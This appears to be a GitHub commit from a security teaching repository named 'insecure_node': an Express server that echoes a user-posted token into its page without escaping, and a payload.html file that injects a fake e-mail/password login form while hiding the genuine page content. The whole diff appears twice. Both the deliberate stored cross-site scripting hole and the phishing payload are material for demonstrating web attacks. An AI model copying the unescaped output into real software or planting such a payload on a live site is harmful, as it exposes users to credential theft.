chrisparnin · October 7, 2018 17:27 · chrisparnin · Oct 7, 2018 · chrisparnin · Oct 7, 2018
diff --git a/README.md b/README.md
diff --git a/index.js b/index.js
 const express = require('express')
 const bodyParser = require('body-parser')

 const app = express()
 const port = 3000

 let token = '';

 // parse application/x-www-form-urlencoded
 app.use(bodyParser.urlencoded({ extended: false }))
 // parse application/json
 // app.use(bodyParser.json())

 app.get('/', function (req, res) 
 {
    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
 });

 app.post('/', function (req, res) 
 {
    console.log(req.body);
    token = req.body.token;
    res.send('ok\n');
 });

 app.listen(port, () => console.log(`Example app listening on port ${port}!`))
diff --git a/package.json b/package.json
 {
  "name": "insecure_node",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "body-parser": "^1.18.3",
    "express": "^4.16.3"
  }
 }
diff --git a/payload.html b/payload.html

 <div>
 <style scoped> 
 @import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");

 * {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
 }

 html, body {
  width: 100%;
  height: 100%;
 }

 body {
 background: #614385;  /* fallback for old browsers */
 background: -webkit-linear-gradient(to right, #516395, #614385);  /* Chrome 10-25, Safari 5.1-6 */
 background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
  font-family: 'Raleway', sans-serif;
  letter-spacing: 0.1em;
 }

  .container {
    width: 400px;
    height: 400px;
    background: #EDEDED;
    position: absolute;
    margin: auto;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    border-radius: 10px;
    border-bottom: 1px solid rgba(255, 255, 255, 0.3);
    box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
  }

    .content-container {
      width: 95%;
      height: 100%;
      position: relative;
      margin: auto;
      display: flex;
      flex-direction: column;
      justify-content: center;
    }
        label {
          color: #E74C3C;
          text-transform: uppercase;
        }
        input {
          width: 100%;
          height: 30px;
          margin-bottom: 20px;
          background: none;
          color: #E74C3C;
          border: none;
          border-bottom: 1px solid #E74C3C;
          opacity: 0.5;
          transition: opacity 0.3s;
        }
        input:hover {
          opacity: 1;
        }
        input:focus {
          outline: none;
        }
      .frg-password {
        text-decoration: none;
        color: #E74C3C;
      }
      .frg-password:hover {
        color: black;
      }
      .frg-password:visited {
        color: #E74C3C;
      }
      .login {
        width: 100%;
        height: 30px;
        border: none;
        margin-bottom: 20px;
        border-radius: 25px;
        font-family: 'Raleway', sans-serif;
        letter-spacing: 0.2em;
        color: #E74C3C;
        transition: background 1s, color 1s;
      }
      .login:hover {
        background: #E74C3C;
        color: #ECF0F1;
        cursor: pointer;
      }
      .media {
        width: 100%;
        height: 30px;
        border: none;
        margin: 5px 0;
        border-radius: 25px;
        opacity: 0.8;
        transition: opacity 0.3s;
      }
      .media:hover {
        opacity: 1;
        cursor: pointer;
      }
      .fb {
        background: #3A5A98;
        color: white;
      }
      .g {
        background: #DC4437;
        color: white;
      }
      button:focus {
        outline: none;
      }
 </style>
  <div class="container">
    <div class="content-container">
      <label for="email">E-mail</label><br>
      <input id="email" type="text" placeholder="[email protected]" required>
      <label for="password">Password</label><br>
      <input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
      <a class="frg-password" href="#">Forgot password ?</a><br>
      <button class="login">LOGIN</button>
    </div>
  </div>
  <script>
    var element = document.getElementById('share');
    element.style = "visibility: hidden;"
  </script> 
 </div>
	const express = require('express')
	const bodyParser = require('body-parser')

	const app = express()
	const port = 3000

	let token = '';

	// parse application/x-www-form-urlencoded
	app.use(bodyParser.urlencoded({ extended: false }))
	// parse application/json
	// app.use(bodyParser.json())

	app.get('/', function (req, res)
	{
	res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
	});

	app.post('/', function (req, res)
	{
	console.log(req.body);
	token = req.body.token;
	res.send('ok\n');
	});

	app.listen(port, () => console.log(`Example app listening on port ${port}!`))
	{
	"name": "insecure_node",
	"version": "1.0.0",
	"description": "",
	"main": "index.js",
	"scripts": {
	"test": "echo \"Error: no test specified\" && exit 1"
	},
	"author": "",
	"license": "ISC",
	"dependencies": {
	"body-parser": "^1.18.3",
	"express": "^4.16.3"
	}
	}

	<div>
	<style scoped>
	@import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");

	* {
	margin: 0;
	padding: 0;
	box-sizing: border-box;
	}

	html, body {
	width: 100%;
	height: 100%;
	}

	body {
	background: #614385; /* fallback for old browsers */
	background: -webkit-linear-gradient(to right, #516395, #614385); /* Chrome 10-25, Safari 5.1-6 */
	background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
	font-family: 'Raleway', sans-serif;
	letter-spacing: 0.1em;
	}

	.container {
	width: 400px;
	height: 400px;
	background: #EDEDED;
	position: absolute;
	margin: auto;
	top: 0;
	bottom: 0;
	left: 0;
	right: 0;
	border-radius: 10px;
	border-bottom: 1px solid rgba(255, 255, 255, 0.3);
	box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
	}

	.content-container {
	width: 95%;
	height: 100%;
	position: relative;
	margin: auto;
	display: flex;
	flex-direction: column;
	justify-content: center;
	}
	label {
	color: #E74C3C;
	text-transform: uppercase;
	}
	input {
	width: 100%;
	height: 30px;
	margin-bottom: 20px;
	background: none;
	color: #E74C3C;
	border: none;
	border-bottom: 1px solid #E74C3C;
	opacity: 0.5;
	transition: opacity 0.3s;
	}
	input:hover {
	opacity: 1;
	}
	input:focus {
	outline: none;
	}
	.frg-password {
	text-decoration: none;
	color: #E74C3C;
	}
	.frg-password:hover {
	color: black;
	}
	.frg-password:visited {
	color: #E74C3C;
	}
	.login {
	width: 100%;
	height: 30px;
	border: none;
	margin-bottom: 20px;
	border-radius: 25px;
	font-family: 'Raleway', sans-serif;
	letter-spacing: 0.2em;
	color: #E74C3C;
	transition: background 1s, color 1s;
	}
	.login:hover {
	background: #E74C3C;
	color: #ECF0F1;
	cursor: pointer;
	}
	.media {
	width: 100%;
	height: 30px;
	border: none;
	margin: 5px 0;
	border-radius: 25px;
	opacity: 0.8;
	transition: opacity 0.3s;
	}
	.media:hover {
	opacity: 1;
	cursor: pointer;
	}
	.fb {
	background: #3A5A98;
	color: white;
	}
	.g {
	background: #DC4437;
	color: white;
	}
	button:focus {
	outline: none;
	}
	</style>
	<div class="container">
	<div class="content-container">
	<label for="email">E-mail</label><br>
	<input id="email" type="text" placeholder="[email protected]" required>
	<label for="password">Password</label><br>
	<input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
	<a class="frg-password" href="#">Forgot password ?</a><br>
	<button class="login">LOGIN</button>
	</div>
	</div>
	<script>
	var element = document.getElementById('share');
	element.style = "visibility: hidden;"
	</script>
	</div>